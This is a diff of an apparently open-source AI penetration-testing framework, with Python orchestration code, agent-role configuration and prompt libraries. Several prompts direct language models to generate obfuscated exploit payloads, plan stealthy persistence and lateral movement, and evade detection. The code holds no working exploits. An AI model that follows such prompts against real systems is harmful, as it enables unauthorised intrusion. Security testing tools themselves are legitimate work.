||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"findings": []
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Your custom logic here
|
||||||
|
# Example: API endpoint testing
|
||||||
|
results["findings"] = self._scan_api_endpoints(target)
|
||||||
|
|
||||||
|
# Use AI for analysis
|
||||||
|
ai_analysis = self._ai_analyze(results["findings"])
|
||||||
|
results["ai_analysis"] = ai_analysis
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error in {self.name}: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _scan_api_endpoints(self, target: str) -> list:
|
||||||
|
"""Custom scanning logic"""
|
||||||
|
# Implement your custom scanning logic
|
||||||
|
return [
|
||||||
|
{"endpoint": "/api/users", "method": "GET", "auth": "required"},
|
||||||
|
{"endpoint": "/api/admin", "method": "POST", "auth": "weak"}
|
||||||
|
]
|
||||||
|
|
||||||
|
def _ai_analyze(self, findings: list) -> Dict:
|
||||||
|
"""Use AI to analyze findings"""
|
||||||
|
prompt = f"""
|
||||||
|
Analyze the following API security findings:
|
||||||
|
|
||||||
|
{findings}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Security assessment
|
||||||
|
2. Risk prioritization
|
||||||
|
3. Exploitation recommendations
|
||||||
|
4. Remediation advice
|
||||||
|
|
||||||
|
Response in JSON format.
|
||||||
|
"""
|
||||||
|
|
||||||
|
system_prompt = "You are an API security expert."
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = self.llm.generate(prompt, system_prompt)
|
||||||
|
return {"analysis": response}
|
||||||
|
except Exception as e:
|
||||||
|
return {"error": str(e)}
|
||||||
357
neurosploit.py
Normal file
357
neurosploit.py
Normal file
@@ -0,0 +1,357 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
NeuroSploitv2 - AI-Powered Penetration Testing Framework
|
||||||
|
Author: Security Research Team
|
||||||
|
License: MIT
|
||||||
|
Version: 2.0.0
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import argparse
|
||||||
|
import json
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Dict, List, Optional
|
||||||
|
import logging
|
||||||
|
from datetime import datetime
|
||||||
|
|
||||||
|
# Setup logging
|
||||||
|
logging.basicConfig(
|
||||||
|
level=logging.INFO,
|
||||||
|
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
|
||||||
|
handlers=[
|
||||||
|
logging.FileHandler('logs/neurosploit.log'),
|
||||||
|
logging.StreamHandler(sys.stdout)
|
||||||
|
]
|
||||||
|
)
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
from agents.base_agent import BaseAgent
|
||||||
|
|
||||||
|
class NeuroSploitv2:
|
||||||
|
"""Main framework class for NeuroSploitv2"""
|
||||||
|
|
||||||
|
def __init__(self, config_path: str = "config/config.json"):
|
||||||
|
"""Initialize the framework"""
|
||||||
|
self.config_path = config_path
|
||||||
|
self.config = self._load_config()
|
||||||
|
# self.agents = {} # Removed as agents will be dynamically created per role
|
||||||
|
self.session_id = datetime.now().strftime("%Y%m%d_%H%M%S")
|
||||||
|
self._setup_directories()
|
||||||
|
|
||||||
|
# LLMManager instance will be created dynamically per agent role to select specific profiles
|
||||||
|
self.llm_manager_instance: Optional[LLMManager] = None
|
||||||
|
|
||||||
|
logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}")
|
||||||
|
|
||||||
|
def _setup_directories(self):
|
||||||
|
"""Create necessary directories"""
|
||||||
|
dirs = ['logs', 'reports', 'data', 'custom_agents', 'results']
|
||||||
|
for d in dirs:
|
||||||
|
Path(d).mkdir(exist_ok=True)
|
||||||
|
|
||||||
|
def _load_config(self) -> Dict:
|
||||||
|
"""Load configuration from file"""
|
||||||
|
if os.path.exists(self.config_path):
|
||||||
|
with open(self.config_path, 'r') as f:
|
||||||
|
return json.load(f)
|
||||||
|
return self._create_default_config()
|
||||||
|
|
||||||
|
def _create_default_config(self) -> Dict:
|
||||||
|
"""Create default configuration"""
|
||||||
|
config = {
|
||||||
|
"llm": {
|
||||||
|
"provider": "gemini",
|
||||||
|
"model": "gemini-pro",
|
||||||
|
"api_key": "",
|
||||||
|
"temperature": 0.7,
|
||||||
|
"max_tokens": 4096
|
||||||
|
},
|
||||||
|
"agent_roles": {
|
||||||
|
"bug_bounty_hunter": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"],
|
||||||
|
"description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
|
||||||
|
},
|
||||||
|
"blue_team_agent": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "claude_opus_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Analyzes logs and telemetry for threats, provides defensive strategies."
|
||||||
|
},
|
||||||
|
"exploit_expert": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gpt_4o_default",
|
||||||
|
"tools_allowed": ["metasploit", "nmap"],
|
||||||
|
"description": "Devises exploitation strategies and payloads for identified vulnerabilities."
|
||||||
|
},
|
||||||
|
"red_team_agent": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["nmap", "metasploit", "hydra"],
|
||||||
|
"description": "Plans and executes simulated attacks to test an organization's defenses."
|
||||||
|
},
|
||||||
|
"replay_attack_specialist": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "ollama_llama3_default",
|
||||||
|
"tools_allowed": ["burpsuite"],
|
||||||
|
"description": "Identifies and leverages replay attack vectors in network traffic or authentication."
|
||||||
|
},
|
||||||
|
"pentest_generalist": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"],
|
||||||
|
"description": "Performs comprehensive penetration tests across various domains."
|
||||||
|
},
|
||||||
|
"owasp_expert": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gemini_pro_default",
|
||||||
|
"tools_allowed": ["burpsuite", "sqlmap"],
|
||||||
|
"description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
|
||||||
|
},
|
||||||
|
"cwe_expert": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "claude_opus_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
|
||||||
|
},
|
||||||
|
"malware_analyst": {
|
||||||
|
"enabled": True,
|
||||||
|
"llm_profile": "gpt_4o_default",
|
||||||
|
"tools_allowed": [],
|
||||||
|
"description": "Examines malware samples to understand functionality and identify IOCs."
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"methodologies": {
|
||||||
|
"owasp_top10": True,
|
||||||
|
"cwe_top25": True,
|
||||||
|
"network_pentest": True,
|
||||||
|
"ad_pentest": True,
|
||||||
|
"web_security": True
|
||||||
|
},
|
||||||
|
"tools": {
|
||||||
|
"nmap": "/usr/bin/nmap",
|
||||||
|
"metasploit": "/usr/bin/msfconsole",
|
||||||
|
"burpsuite": "/usr/bin/burpsuite",
|
||||||
|
"sqlmap": "/usr/bin/sqlmap",
|
||||||
|
"hydra": "/usr/bin/hydra"
|
||||||
|
},
|
||||||
|
"output": {
|
||||||
|
"format": "json",
|
||||||
|
"verbose": True,
|
||||||
|
"save_artifacts": True
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Save default config
|
||||||
|
os.makedirs(os.path.dirname(self.config_path), exist_ok=True)
|
||||||
|
with open(self.config_path, 'w') as f:
|
||||||
|
json.dump(config, f, indent=4)
|
||||||
|
|
||||||
|
logger.info(f"Created default configuration at {self.config_path}")
|
||||||
|
return config
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def _initialize_llm_manager(self, agent_llm_profile: Optional[str] = None):
|
||||||
|
"""Initializes LLMManager with a specific profile or default."""
|
||||||
|
llm_config = self.config.get('llm', {})
|
||||||
|
if agent_llm_profile:
|
||||||
|
# Temporarily modify config to set the default profile for LLMManager init
|
||||||
|
original_default = llm_config.get('default_profile')
|
||||||
|
llm_config['default_profile'] = agent_llm_profile
|
||||||
|
self.llm_manager_instance = LLMManager({"llm": llm_config})
|
||||||
|
llm_config['default_profile'] = original_default # Restore original default
|
||||||
|
else:
|
||||||
|
self.llm_manager_instance = LLMManager({"llm": llm_config})
|
||||||
|
|
||||||
|
def execute_agent_role(self, agent_role_name: str, user_input: str, additional_context: Optional[Dict] = None):
|
||||||
|
"""Execute a specific agent role with a given input."""
|
||||||
|
logger.info(f"Starting execution for agent role: {agent_role_name}")
|
||||||
|
|
||||||
|
agent_roles_config = self.config.get('agent_roles', {})
|
||||||
|
role_config = agent_roles_config.get(agent_role_name)
|
||||||
|
|
||||||
|
if not role_config:
|
||||||
|
logger.error(f"Agent role '{agent_role_name}' not found in configuration.")
|
||||||
|
return {"error": f"Agent role '{agent_role_name}' not found."}
|
||||||
|
|
||||||
|
if not role_config.get('enabled', False):
|
||||||
|
logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.")
|
||||||
|
return {"warning": f"Agent role '{agent_role_name}' is disabled."}
|
||||||
|
|
||||||
|
llm_profile_name = role_config.get('llm_profile', self.config['llm']['default_profile'])
|
||||||
|
self._initialize_llm_manager(llm_profile_name)
|
||||||
|
|
||||||
|
if not self.llm_manager_instance:
|
||||||
|
logger.error("LLM Manager could not be initialized.")
|
||||||
|
return {"error": "LLM Manager initialization failed."}
|
||||||
|
|
||||||
|
# Get the prompts for the selected agent role
|
||||||
|
# Assuming agent_role_name directly maps to the .md filename
|
||||||
|
agent_prompts = self.llm_manager_instance.prompts.get("md_prompts", {}).get(agent_role_name)
|
||||||
|
if not agent_prompts:
|
||||||
|
logger.error(f"Prompts for agent role '{agent_role_name}' not found in MD library.")
|
||||||
|
return {"error": f"Prompts for agent role '{agent_role_name}' not found."}
|
||||||
|
|
||||||
|
# Instantiate and execute the BaseAgent
|
||||||
|
agent_instance = BaseAgent(agent_role_name, self.config, self.llm_manager_instance, agent_prompts)
|
||||||
|
|
||||||
|
results = agent_instance.execute(user_input, additional_context)
|
||||||
|
|
||||||
|
# Save results
|
||||||
|
campaign_results = {
|
||||||
|
"session_id": self.session_id,
|
||||||
|
"agent_role": agent_role_name,
|
||||||
|
"input": user_input,
|
||||||
|
"timestamp": datetime.now().isoformat(),
|
||||||
|
"results": results
|
||||||
|
}
|
||||||
|
self._save_results(campaign_results)
|
||||||
|
return campaign_results
|
||||||
|
|
||||||
|
def _save_results(self, results: Dict):
|
||||||
|
"""Save campaign results"""
|
||||||
|
output_file = f"results/campaign_{self.session_id}.json"
|
||||||
|
with open(output_file, 'w') as f:
|
||||||
|
json.dump(results, f, indent=4)
|
||||||
|
logger.info(f"Results saved to {output_file}")
|
||||||
|
|
||||||
|
# Generate report
|
||||||
|
self._generate_report(results)
|
||||||
|
|
||||||
|
def _generate_report(self, results: Dict):
|
||||||
|
"""Generate HTML report for agent role execution"""
|
||||||
|
report_file = f"reports/report_{self.session_id}.html"
|
||||||
|
|
||||||
|
html = f"""
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>NeuroSploitv2 Report - {results['session_id']}</title>
|
||||||
|
<style>
|
||||||
|
body {{ font-family: Arial, sans-serif; margin: 20px; background: #1e1e1e; color: #fff; }}
|
||||||
|
h1 {{ color: #00ff00; }}
|
||||||
|
h2 {{ color: #00ccff; border-bottom: 2px solid #00ccff; }}
|
||||||
|
.phase {{ background: #2d2d2d; padding: 15px; margin: 10px 0; border-radius: 5px; }}
|
||||||
|
.finding {{ background: #3d3d3d; padding: 10px; margin: 5px 0; border-left: 3px solid #ff6600; }}
|
||||||
|
.success {{ color: #00ff00; }}
|
||||||
|
.warning {{ color: #ffaa00; }}
|
||||||
|
.error {{ color: #ff0000; }}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>NeuroSploitv2 Agent Role Execution Report</h1>
|
||||||
|
<p><strong>Agent Role:</strong> {results.get('agent_role', 'N/A')}</p>
|
||||||
|
<p><strong>Input:</strong> {results.get('input', 'N/A')}</p>
|
||||||
|
<p><strong>Session:</strong> {results['session_id']}</p>
|
||||||
|
<p><strong>Timestamp:</strong> {results['timestamp']}</p>
|
||||||
|
<hr>
|
||||||
|
"""
|
||||||
|
|
||||||
|
html += f"<h2>Agent Results: {results.get('agent_role', 'N/A').replace('_', ' ').title()}</h2>"
|
||||||
|
html += f"<div class='phase'><pre>{json.dumps(results.get('results', {}), indent=2)}</pre></div>"
|
||||||
|
|
||||||
|
html += "</body></html>"
|
||||||
|
|
||||||
|
with open(report_file, 'w') as f:
|
||||||
|
f.write(html)
|
||||||
|
|
||||||
|
logger.info(f"Report generated: {report_file}")
|
||||||
|
|
||||||
|
def interactive_mode(self):
|
||||||
|
"""Start interactive mode"""
|
||||||
|
print("""
|
||||||
|
╔═══════════════════════════════════════════════════════════╗
|
||||||
|
║ NeuroSploitv2 - AI Offensive Security ║
|
||||||
|
║ Interactive Mode ║
|
||||||
|
╚═══════════════════════════════════════════════════════════╝
|
||||||
|
""")
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
cmd = input("\nNeuroSploit> ").strip()
|
||||||
|
|
||||||
|
if cmd.lower() in ['exit', 'quit']:
|
||||||
|
break
|
||||||
|
elif cmd.lower() == 'help':
|
||||||
|
self._show_help()
|
||||||
|
elif cmd.startswith('run_agent'):
|
||||||
|
parts = cmd.split(maxsplit=2) # e.g., run_agent red_team_agent "scan example.com"
|
||||||
|
if len(parts) >= 3:
|
||||||
|
agent_role_name = parts[1]
|
||||||
|
user_input = parts[2].strip('"')
|
||||||
|
self.execute_agent_role(agent_role_name, user_input)
|
||||||
|
else:
|
||||||
|
print("Usage: run_agent <agent_role_name> \"<user_input>\"")
|
||||||
|
elif cmd.startswith('config'):
|
||||||
|
print(json.dumps(self.config, indent=2))
|
||||||
|
elif cmd.lower() == 'list_roles':
|
||||||
|
print("\nAvailable Agent Roles:")
|
||||||
|
for role_name, role_details in self.config.get('agent_roles', {}).items():
|
||||||
|
status = "Enabled" if role_details.get("enabled") else "Disabled"
|
||||||
|
print(f" - {role_name} ({status}): {role_details.get('description', 'No description.')}")
|
||||||
|
print(f" LLM Profile: {role_details.get('llm_profile', 'default')}")
|
||||||
|
print(f" Tools Allowed: {', '.join(role_details.get('tools_allowed', [])) or 'None'}")
|
||||||
|
else:
|
||||||
|
print("Unknown command. Type 'help' for available commands.")
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("\nExiting...")
|
||||||
|
break
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error: {e}")
|
||||||
|
|
||||||
|
def _show_help(self):
|
||||||
|
"""Show help menu"""
|
||||||
|
print("""
|
||||||
|
Available Commands:
|
||||||
|
run_agent <role> "<input>"- Execute a specific agent role (e.g., run_agent red_team_agent "scan target.com")
|
||||||
|
list_roles - List all configured agent roles and their details
|
||||||
|
config - Show current configuration
|
||||||
|
help - Show this help menu
|
||||||
|
exit/quit - Exit the framework
|
||||||
|
""")
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
"""Main entry point"""
|
||||||
|
parser = argparse.ArgumentParser(
|
||||||
|
description='NeuroSploitv2 - AI-Powered Penetration Testing Framework',
|
||||||
|
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||||
|
epilog="""
|
||||||
|
Examples:
|
||||||
|
python neurosploit.py --agent-role red_team_agent --input "Scan example.com for vulnerabilities"
|
||||||
|
python neurosploit.py -i
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
parser.add_argument('-r', '--agent-role', help='Name of the agent role to execute')
|
||||||
|
parser.add_argument('-i', '--interactive', action='store_true',
|
||||||
|
help='Start in interactive mode')
|
||||||
|
parser.add_argument('--input', help='Input prompt/task for the agent role')
|
||||||
|
parser.add_argument('-c', '--config', default='config/config.json',
|
||||||
|
help='Configuration file path')
|
||||||
|
parser.add_argument('-v', '--verbose', action='store_true',
|
||||||
|
help='Enable verbose output')
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if args.verbose:
|
||||||
|
logging.getLogger().setLevel(logging.DEBUG)
|
||||||
|
|
||||||
|
# Initialize framework
|
||||||
|
framework = NeuroSploitv2(config_path=args.config)
|
||||||
|
|
||||||
|
if args.interactive:
|
||||||
|
framework.interactive_mode()
|
||||||
|
elif args.agent_role and args.input:
|
||||||
|
framework.execute_agent_role(args.agent_role, args.input)
|
||||||
|
else:
|
||||||
|
parser.print_help()
|
||||||
|
print("\n[!] Please specify an agent role and input or use interactive mode (-i)")
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
52
prompts/library.json
Normal file
52
prompts/library.json
Normal file
@@ -0,0 +1,52 @@
|
|||||||
|
{
|
||||||
|
"network_recon": {
|
||||||
|
"network_scan": "Analyze network scan results and identify attack vectors",
|
||||||
|
"osint": "Perform OSINT analysis on target organization",
|
||||||
|
"ai_analysis_user": "Analyze the following network reconnaissance data and provide insights:\n\n{recon_data_json}\n\nProvide:\n1. Attack surface summary\n2. Prioritized network target list\n3. Identified network vulnerabilities or misconfigurations\n4. Recommended next steps for network exploitation\n5. Network risk assessment\n6. Stealth considerations for network activities\n\nResponse in JSON format with actionable recommendations.",
|
||||||
|
"ai_analysis_system": "You are an expert network penetration tester analyzing reconnaissance data.\nIdentify network security weaknesses, network attack vectors, and provide strategic recommendations.\nConsider both technical and operational security aspects."
|
||||||
|
},
|
||||||
|
"web_recon": {
|
||||||
|
"web_enum": "Enumerate web application for vulnerabilities",
|
||||||
|
"ai_analysis_user": "Analyze the following potential web vulnerabilities identified on {target} and provide insights:\n\nVulnerabilities: {vulnerabilities_json}\n\nProvide:\n1. Prioritized list of vulnerabilities\n2. Recommended exploitation steps for each (if applicable)\n3. Potential impact\n4. Remediation suggestions\n\nResponse in JSON format with actionable recommendations.",
|
||||||
|
"ai_analysis_system": "You are an expert web penetration tester and security analyst.\nProvide precise analysis of web vulnerabilities and practical advice for exploitation and remediation."
|
||||||
|
},
|
||||||
|
"exploitation": {
|
||||||
|
"ai_exploit_planning_user": "Plan an exploitation strategy based on the following data:\n\nVulnerabilities Identified:\n{vulnerabilities_json}\n\nReconnaissance Data:\n{recon_data_json}\n\nProvide:\n1. Prioritized exploitation order\n2. Recommended exploits for each vulnerability\n3. Payload suggestions\n4. Evasion techniques\n5. Fallback strategies\n6. Success probability estimates\n\nResponse in JSON format with detailed exploitation roadmap.",
|
||||||
|
"ai_exploit_planning_system": "You are an expert exploit developer and penetration tester.\nCreate sophisticated exploitation plans considering detection, success rates, and impact.\nPrioritize stealthy, reliable exploits over noisy attempts.",
|
||||||
|
"analyze_vulnerability_user": "Analyze the following vulnerability data and provide exploitation recommendations:\n\nVulnerability: {vulnerability_data_json}\n\nProvide:\n1. Severity assessment (Critical/High/Medium/Low)\n2. Exploitation difficulty\n3. Potential impact\n4. Recommended exploit techniques\n5. Detection evasion strategies\n6. Post-exploitation actions\n\nResponse in JSON format.",
|
||||||
|
"analyze_vulnerability_system": "You are an expert penetration tester and security researcher.\nAnalyze vulnerabilities and provide detailed, actionable exploitation strategies.\nConsider OWASP, CWE, and MITRE ATT&CK frameworks.\nAlways include ethical considerations and legal boundaries.",
|
||||||
|
"generate_payload_user": "Generate an exploit payload for the following scenario:\n\nTarget Information:\n{target_info_json}\n\nVulnerability Type: {vulnerability_type}\n\nRequirements:\n1. Generate a working payload\n2. Include obfuscation techniques\n3. Add error handling\n4. Ensure minimal detection footprint\n5. Include cleanup procedures\n\nProvide the payload code with detailed comments.",
|
||||||
|
"generate_payload_system": "You are an expert exploit developer.\nGenerate sophisticated, tested payloads that are effective yet responsible.\nAlways include safety mechanisms and ethical guidelines."
|
||||||
|
},
|
||||||
|
"privesc": {
|
||||||
|
"suggest_privilege_escalation_user": "Based on the following system information, suggest privilege escalation techniques:\n\nSystem Info:\n{system_info_json}\n\nProvide:\n1. Top 5 privilege escalation vectors\n2. Required tools and commands\n3. Detection likelihood\n4. Success probability\n5. Alternative approaches\n\nResponse in JSON format with prioritized list.",
|
||||||
|
"suggest_privilege_escalation_system": "You are a privilege escalation specialist.\nAnalyze system configurations and suggest effective escalation paths.\nConsider Windows, Linux, and Active Directory environments."
|
||||||
|
},
|
||||||
|
"persistence": {
|
||||||
|
"ai_persistence_strategy_user": "Plan a comprehensive persistence strategy based on the following context:\n\n{context_json}\n\nProvide:\n1. Recommended persistence techniques (prioritized)\n2. Stealth considerations\n3. Resilience against system reboots\n4. Evasion of detection mechanisms\n5. Multiple fallback mechanisms\n6. Cleanup and removal procedures\n\nResponse in JSON format with detailed implementation plan.",
|
||||||
|
"ai_persistence_strategy_system": "You are an expert in persistence techniques and advanced persistent threats.\nDesign robust, stealthy persistence mechanisms that survive reboots and detection attempts.\nConsider both Windows and Linux environments.\nPrioritize operational security and longevity."
|
||||||
|
},
|
||||||
|
"lateral_movement": {
|
||||||
|
"ai_movement_strategy_user": "Plan a lateral movement strategy based on the following:\n\nCurrent Context:\n{context_json}\n\nDiscovered Hosts:\n{hosts_json}\n\nProvide:\n1. Target prioritization (high-value targets first)\n2. Movement techniques for each target\n3. Credential strategies\n4. Evasion techniques\n5. Attack path optimization\n6. Fallback options\n\nResponse in JSON format with detailed attack paths.",
|
||||||
|
"ai_movement_strategy_system": "You are an expert in lateral movement and Active Directory attacks.\nPlan sophisticated movement strategies that minimize detection and maximize impact.\nConsider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.\nPrioritize domain controllers and critical infrastructure."
|
||||||
|
},
|
||||||
|
"vulnerability_testing": {
|
||||||
|
"ssrf_user": "Analyze the following HTTP request/response data for potential Server-Side Request Forgery (SSRF) vulnerabilities:\n\n{http_data_json}\n\nProvide:\n1. Confirmation of SSRF vulnerability\n2. Potential impact\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"ssrf_system": "You are an expert web vulnerability tester, specializing in SSRF.\nAnalyze provided HTTP data to confirm and detail SSRF vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"sql_injection_user": "Analyze the following input field data and database responses for potential SQL Injection vulnerabilities:\n\n{input_data_json}\n\nProvide:\n1. Confirmation of SQL Injection vulnerability (including type: boolean-based, error-based, time-based, UNION-based)\n2. Potential impact (data exfiltration, authentication bypass)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"sql_injection_system": "You are an expert web vulnerability tester, specializing in SQL Injection (all types).\nAnalyze provided data to confirm and detail SQL Injection vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"xss_user": "Analyze the following input fields, reflected outputs, and DOM for potential Cross-Site Scripting (XSS) vulnerabilities:\n\n{xss_data_json}\n\nProvide:\n1. Confirmation of XSS vulnerability (including type: Reflected, Stored, DOM-based)\n2. Potential impact (session hijacking, defacement, malware delivery)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"xss_system": "You are an expert web vulnerability tester, specializing in XSS (Reflected, Stored, DOM-based).\nAnalyze provided data to confirm and detail XSS vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"lfi_user": "Analyze the following file path inputs and server responses for potential Local File Inclusion (LFI) vulnerabilities:\n\n{lfi_data_json}\n\nProvide:\n1. Confirmation of LFI vulnerability\n2. Potential impact (information disclosure, remote code execution via log poisoning)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"lfi_system": "You are an expert web vulnerability tester, specializing in Local File Inclusion (LFI).\nAnalyze provided data to confirm and detail LFI vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"broken_object_user": "Analyze the following API endpoint behavior and object IDs for potential Broken Object Level Authorization (BOLA) vulnerabilities:\n\n{api_data_json}\n\nProvide:\n1. Confirmation of BOLA vulnerability\n2. Potential impact (unauthorized access to sensitive data/actions)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"broken_object_system": "You are an expert API security tester, specializing in Broken Object Level Authorization (BOLA).\nAnalyze provided API data to confirm and detail BOLA vulnerabilities, their impact, and exploitation.",
|
||||||
|
|
||||||
|
"broken_auth_user": "Analyze the following authentication mechanisms (login, session management, password reset) for potential Broken Authentication vulnerabilities:\n\n{auth_data_json}\n\nProvide:\n1. Confirmation of Broken Authentication vulnerability (e.g., weak password policy, session fixation, credential stuffing, improper logout)\n2. Potential impact (account takeover, unauthorized access)\n3. Exploitation steps (if confirmed)\n4. Remediation suggestions\n\nResponse in JSON format.",
|
||||||
|
"broken_auth_system": "You are an expert web security tester, specializing in Broken Authentication vulnerabilities (e.g., session management, password policies, credential handling).\nAnalyze provided data to confirm and detail Broken Authentication vulnerabilities, their impact, and exploitation."
|
||||||
|
}
|
||||||
|
}
|
||||||
20
prompts/md_library/blue_team_agent.md
Normal file
20
prompts/md_library/blue_team_agent.md
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
# Blue Team Agent Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As a Blue Team Agent, analyze the provided security logs, alerts, and system telemetry to detect and respond to potential threats. Focus on identifying indicators of compromise (IOCs) and anomalous behavior.
|
||||||
|
|
||||||
|
**Security Logs/Alerts:**
|
||||||
|
{logs_alerts_json}
|
||||||
|
|
||||||
|
**System Telemetry:**
|
||||||
|
{telemetry_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Identify any active or past compromise attempts.
|
||||||
|
2. Detail identified IOCs (IPs, hashes, domains, etc.).
|
||||||
|
3. Suggest immediate containment and eradication steps.
|
||||||
|
4. Provide recommendations for forensic analysis.
|
||||||
|
5. Classify the severity and potential impact.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are an experienced Blue Team security analyst, skilled in threat detection, incident response, and forensic analysis. Your goal is to protect systems, identify threats, and provide actionable intelligence for defense. Emphasize detection techniques, mitigation strategies, and system hardening.
|
||||||
20
prompts/md_library/bug_bounty_hunter.md
Normal file
20
prompts/md_library/bug_bounty_hunter.md
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
# Bug Bounty Hunter Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As a Bug Bounty Hunter, analyze the provided target information and reconnaissance data to identify potential vulnerabilities. Focus on high-impact findings and provide clear reproduction steps.
|
||||||
|
|
||||||
|
**Target Information:**
|
||||||
|
{target_info_json}
|
||||||
|
|
||||||
|
**Reconnaissance Data:**
|
||||||
|
{recon_data_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Identify and prioritize potential vulnerabilities (OWASP Top 10, business logic flaws, etc.).
|
||||||
|
2. For each vulnerability, provide a brief description and potential impact.
|
||||||
|
3. Detail clear, step-by-step reproduction instructions.
|
||||||
|
4. Suggest potential fixes or mitigations.
|
||||||
|
5. Classify the severity (Critical, High, Medium, Low).
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are an expert Bug Bounty Hunter with extensive experience in finding critical vulnerabilities in web applications and APIs. Your responses should be concise, technically accurate, and focused on actionable findings. Always consider the perspective of a real-world attacker while maintaining ethical guidelines.
|
||||||
16
prompts/md_library/cwe.md.
Normal file
16
prompts/md_library/cwe.md.
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
# CWE Top 25 Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
Analyze the provided code snippets or vulnerability reports against the MITRE CWE Top 25 Most Dangerous Software Errors. Identify occurrences of these common weaknesses and suggest secure coding practices.
|
||||||
|
|
||||||
|
**Code Snippets/Vulnerability Reports:**
|
||||||
|
{code_vulnerability_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Identify any weaknesses present that fall under the CWE Top 25.
|
||||||
|
2. For each identified CWE, explain its presence and potential impact.
|
||||||
|
3. Provide examples of secure coding practices to prevent or mitigate the CWE.
|
||||||
|
4. Suggest testing methodologies to detect these weaknesses.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a secure coding expert and software architect with a profound understanding of the MITRE CWE Top 25. Your role is to identify critical software weaknesses, explain their implications, and guide developers towards robust, secure coding solutions. Focus on code-level analysis and preventative measures.
|
||||||
20
prompts/md_library/exploit_expert.md
Normal file
20
prompts/md_library/exploit_expert.md
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
# Exploit Expert Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As an Exploit Expert, analyze the provided vulnerability details and target specifics to devise a working exploitation strategy and payload. Focus on reliability, stealth, and impact.
|
||||||
|
|
||||||
|
**Vulnerability Details:**
|
||||||
|
{vulnerability_details_json}
|
||||||
|
|
||||||
|
**Target Information:**
|
||||||
|
{target_info_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Describe the vulnerability and its potential impact.
|
||||||
|
2. Propose a detailed exploitation method.
|
||||||
|
3. Generate a suitable exploit payload (if applicable).
|
||||||
|
4. Suggest post-exploitation steps.
|
||||||
|
